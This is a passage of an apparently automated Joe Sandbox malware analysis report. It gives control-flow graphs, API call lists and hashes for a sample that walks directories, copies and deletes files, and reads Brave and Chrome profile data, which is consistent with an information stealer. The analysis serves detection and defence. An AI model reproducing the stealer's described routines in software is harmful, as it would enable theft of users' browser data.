                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F63E8), ref: 0041662A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D4598), ref: 00416643
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D45D8), ref: 0041665B
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F62E0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F6388,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F61D8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F63A0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F63B8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F63D0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F6418,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F6430,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,042D4438), ref: 0041670A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,042F6190), ref: 00416722
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,042F0788), ref: 0041673A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,042F6490), ref: 00416753
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,042D4498), ref: 0041676B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6FDD0000,042EFBD8), ref: 00416790
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6FDD0000,042D4538), ref: 004167A9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6FDD0000,042EFC00), ref: 004167C1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6FDD0000,042F64A8), ref: 004167D9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6FDD0000,042F64C0), ref: 004167F2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6FDD0000,042D42F8), ref: 0041680A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6FDD0000,042D4558), ref: 00416822
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6FDD0000,042F64D8), ref: 0041683B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,042D4638), ref: 0041685C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,042D44F8), ref: 00416874
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,042F6520), ref: 0041688D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,042F6508), ref: 004168A5
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,042D4298), ref: 004168BD
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,042EF868), ref: 004168E3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,042EFCA0), ref: 004168FB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,042F6550), ref: 00416913
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,042D4358), ref: 0041692C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,042D4578), ref: 00416944
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,042EF8E0), ref: 0041695C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,042F64F0), ref: 00416982
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,042D42D8), ref: 0041699A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,042F08C8), ref: 004169B2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,042F6538), ref: 004169CB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,042F67F0), ref: 004169E3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,042D4318), ref: 004169FB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,042D4458), ref: 00416A14
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,042F65F8), ref: 00416A2C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,042F6868), ref: 00416A44
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,042D4338), ref: 00416A66
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,042F6808), ref: 00416A7E
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,042F6778), ref: 00416A96
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,042F65C8), ref: 00416AAF
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,042F6610), ref: 00416AC7
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75450000,042D45B8), ref: 00416AE8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75450000,042D4478), ref: 00416B01
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75DA0000,042D43B8), ref: 00416B22
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75DA0000,042F6718), ref: 00416B3A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,042D4518), ref: 00416B60
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,042D4398), ref: 00416B78
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,042F72A0), ref: 00416B90
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,042F67D8), ref: 00416BA9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,042F7400), ref: 00416BC1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,042F7320), ref: 00416BD9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,042F72C0), ref: 00416BF2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,042F7340), ref: 00416C0A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000,042F6628), ref: 00416C2B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000,042F07C8), ref: 00416C44
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000,042F66B8), ref: 00416C5C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000,042F6640), ref: 00416C74
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75D90000,042F72E0), ref: 00416C96
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6CA80000,042F6658), ref: 00416CB7
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6CA80000,042F7300), ref: 00416CCF
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6CA80000,042F6598), ref: 00416CE8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6CA80000,042F6880), ref: 00416D00
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                                                                              • Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                              • Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1442 411650-4116a4 wsprintfA FindFirstFileA call 415070 1445 4116b3-4116ec call 415070 lstrcat StrCmpCA 1442->1445 1446 4116a6-4116ae call 413220 1442->1446 1451 411704 1445->1451 1452 4116ee-411702 StrCmpCA 1445->1452 1453 4119a3-4119a6 1446->1453 1455 411972-411988 FindNextFileA 1451->1455 1452->1451 1454 411709-41173e wsprintfA call 415070 1452->1454 1460 411740-411756 PathMatchSpecA 1454->1460 1461 4117b6-4117c7 StrCmpCA 1454->1461 1455->1445 1457 41198e-41199e FindClose call 413220 1455->1457 1457->1453 1460->1461 1462 411758-411773 CoInitialize call 4114c0 1460->1462 1463 4117f2-41180f wsprintfA 1461->1463 1464 4117c9-4117f0 wsprintfA 1461->1464 1474 41177c-4117ae call 415070 lstrcat lstrlen 1462->1474 1465 411812-411825 PathMatchSpecA 1463->1465 1464->1465 1467 411925-411929 1465->1467 1468 41182b-4118c5 wsprintfA CopyFileA call 4159e0 call 41a120 call 416d40 call 4093a0 1465->1468 1467->1455 1471 41192b-411934 1467->1471 1487 4118c7-4118fb call 416d40 call 401500 call 404dc0 1468->1487 1488 41190e-411921 DeleteFileA 1468->1488 1471->1455 1473 411936-41196a call 401500 call 411650 1471->1473 1484 41196f 1473->1484 1474->1461 1484->1455 1495 411900-411909 call 416e00 1487->1495 1488->1467 1489 411923 1488->1489 1489->1457 1495->1488
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004116D2
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00411995
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                                                                                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                                                                                                                                                              • API String ID: 1125553467-2524465048
                                                                                                                                                                                                                              • Opcode ID: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
                                                                                                                                                                                                                              • Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1497 40b610-40b6a2 call 416d40 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 call 416d40 * 2 call 4170d0 FindFirstFileA 1516 40b6e1-40b6f5 StrCmpCA 1497->1516 1517 40b6a4-40b6dc call 416e00 * 6 call 413220 1497->1517 1518 40b6f7-40b70b StrCmpCA 1516->1518 1519 40b70d 1516->1519 1562 40bf8b-40bf8e 1517->1562 1518->1519 1521 40b712-40b78b call 416e20 call 416f20 call 416fb0 * 2 call 416ea0 call 416e00 * 3 1518->1521 1522 40bf30-40bf43 FindNextFileA 1519->1522 1567 40b791-40b817 call 416fb0 * 4 call 416ea0 call 416e00 * 4 1521->1567 1568 40b81c-40b89d call 416fb0 * 4 call 416ea0 call 416e00 * 4 1521->1568 1522->1516 1526 40bf49-40bf56 FindClose call 416e00 1522->1526 1532 40bf5b-40bf86 call 416e00 * 5 call 413220 1526->1532 1532->1562 1604 40b8a2-40b8b8 call 4170d0 StrCmpCA 1567->1604 1568->1604 1607 40ba79-40ba8f StrCmpCA 1604->1607 1608 40b8be-40b8d2 StrCmpCA 1604->1608 1609 40ba91-40bad1 call 401500 call 416da0 * 3 call 409b30 1607->1609 1610 40bade-40baf4 StrCmpCA 1607->1610 1608->1607 1611 40b8d8-40b9f2 call 416d40 call 415260 call 416fb0 call 416f20 call 416ea0 call 416e00 * 3 call 4170d0 * 2 CopyFileA call 416d40 call 416fb0 * 2 call 416ea0 call 416e00 * 2 call 416da0 call 4093a0 1608->1611 1676 40bad6-40bad9 1609->1676 1612 40bb66-40bb7e call 416da0 call 415490 1610->1612 1613 40baf6-40bb0d call 4170d0 StrCmpCA 1610->1613 1763 40b9f4-40ba36 call 416da0 call 401500 call 404dc0 call 416e00 1611->1763 1764 40ba3b-40ba74 call 4170d0 DeleteFileA call 417040 call 4170d0 call 416e00 * 2 1611->1764 1635 40bc51-40bc66 StrCmpCA 1612->1635 1636 40bb84-40bb8b 1612->1636 1626 40bb61 1613->1626 1627 40bb0f-40bb5b call 401500 call 416da0 * 3 call 40a030 1613->1627 1633 40beb9-40bec2 1626->1633 1627->1626 1639 40bf20-40bf2b call 417040 * 2 1633->1639 1640 40bec4-40bf15 call 401500 call 416da0 * 2 call 416d40 call 40b610 1633->1640 1648 40be50-40be65 StrCmpCA 1635->1648 1649 40bc6c-40bdcf call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 4170d0 * 2 CopyFileA call 401500 call 416da0 * 3 call 40a6e0 call 401500 call 416da0 * 3 call 40ace0 call 4170d0 StrCmpCA 1635->1649 1642 40bbf7-40bc41 call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1636->1642 1643 40bb8d-40bb94 1636->1643 1639->1522 1712 40bf1a 1640->1712 1720 40bc46 1642->1720 1653 40bbf5 1643->1653 1654 40bb96-40bbef call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1643->1654 1648->1633 1659 40be67-40beae call 401500 call 416da0 * 3 call 40aa20 1648->1659 1796 40bdd1-40be1b call 401500 call 416da0 * 3 call 40b250 1649->1796 1797 40be26-40be3e call 4170d0 DeleteFileA call 417040 1649->1797 1662 40bc4c 1653->1662 1654->1653 1724 40beb3 1659->1724 1662->1633 1676->1633 1712->1639 1720->1662 1724->1633 1763->1764 1764->1607 1813 40be20 1796->1813 1805 40be43-40be4e call 416e00 1797->1805 1805->1633 1813->1797
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040BF4D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                                                                                                              • API String ID: 3334442632-726946144
                                                                                                                                                                                                                              • Opcode ID: 7c9c9f1912102b1f3f3d451c73bf9befd1c369b3dea277ffdfa703e8cc0b22b3
                                                                                                                                                                                                                              • Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c9c9f1912102b1f3f3d451c73bf9befd1c369b3dea277ffdfa703e8cc0b22b3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1814 6bb735a0-6bb735be 1815 6bb735c4-6bb735ed InitializeCriticalSectionAndSpinCount getenv 1814->1815 1816 6bb738e9-6bb738fb call 6bbab320 1814->1816 1817 6bb735f3-6bb735f5 1815->1817 1818 6bb738fc-6bb7390c strcmp 1815->1818 1820 6bb735f8-6bb73614 QueryPerformanceFrequency 1817->1820 1818->1817 1822 6bb73912-6bb73922 strcmp 1818->1822 1823 6bb7374f-6bb73756 1820->1823 1824 6bb7361a-6bb7361c 1820->1824 1825 6bb73924-6bb73932 1822->1825 1826 6bb7398a-6bb7398c 1822->1826 1830 6bb7396e-6bb73982 1823->1830 1831 6bb7375c-6bb73768 1823->1831 1827 6bb73622-6bb7364a _strnicmp 1824->1827 1829 6bb7393d 1824->1829 1825->1827 1828 6bb73938 1825->1828 1826->1820 1832 6bb73944-6bb73957 _strnicmp 1827->1832 1833 6bb73650-6bb7365e 1827->1833 1828->1823 1829->1832 1830->1826 1834 6bb7376a-6bb737a1 QueryPerformanceCounter EnterCriticalSection 1831->1834 1832->1833 1835 6bb7395d-6bb7395f 1832->1835 1833->1835 1836 6bb73664-6bb736a9 GetSystemTimeAdjustment 1833->1836 1837 6bb737b3-6bb737eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 1834->1837 1838 6bb737a3-6bb737b1 1834->1838 1841 6bb73964 1836->1841 1842 6bb736af-6bb73749 call 6bbac110 1836->1842 1839 6bb737ed-6bb737fa 1837->1839 1840 6bb737fc-6bb73839 LeaveCriticalSection 1837->1840 1838->1837 1839->1840 1843 6bb73846-6bb738ac call 6bbac110 1840->1843 1844 6bb7383b-6bb73840 1840->1844 1841->1830 1842->1823 1849 6bb738b2-6bb738ca 1843->1849 1844->1834 1844->1843 1850 6bb738dd-6bb738e3 1849->1850 1851 6bb738cc-6bb738db 1849->1851 1850->1816 1851->1849 1851->1850
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6BBFF688,00001000), ref: 6BB735D5
                                                                                                                                                                                                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BB735E0
                                                                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 6BB735FD
                                                                                                                                                                                                                              • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BB7363F
                                                                                                                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BB7369F
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6BB736E4
                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6BB73773
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFF688), ref: 6BB7377E
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFF688), ref: 6BB737BD
                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6BB737C4
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFF688), ref: 6BB737CB
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFF688), ref: 6BB73801
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6BB73883
                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6BB73902
                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6BB73918
                                                                                                                                                                                                                              • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6BB7394C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                              • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                              • API String ID: 301339242-3790311718
                                                                                                                                                                                                                              • Opcode ID: 70cc32eb8a1677bb8642619136fb9a61be109be63b31b48e310d7dd343081873
                                                                                                                                                                                                                              • Instruction ID: aaf3555ab2df8270d78d79faa6849b77d0b936a72d3931109d7039f862b9424e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70cc32eb8a1677bb8642619136fb9a61be109be63b31b48e310d7dd343081873
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80B1B4B1A093509FDB18DF68D84462ABBEAFB8A700F04893EE999D3350DB35D905CB51
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                              • API String ID: 180737720-445461498
                                                                                                                                                                                                                              • Opcode ID: 70f66335c68ee9bee9e93ad0ea58b8d0e5d9bc99c8bb7c2902da79831dca3d0c
                                                                                                                                                                                                                              • Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70f66335c68ee9bee9e93ad0ea58b8d0e5d9bc99c8bb7c2902da79831dca3d0c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00411B9D
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00411D52
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
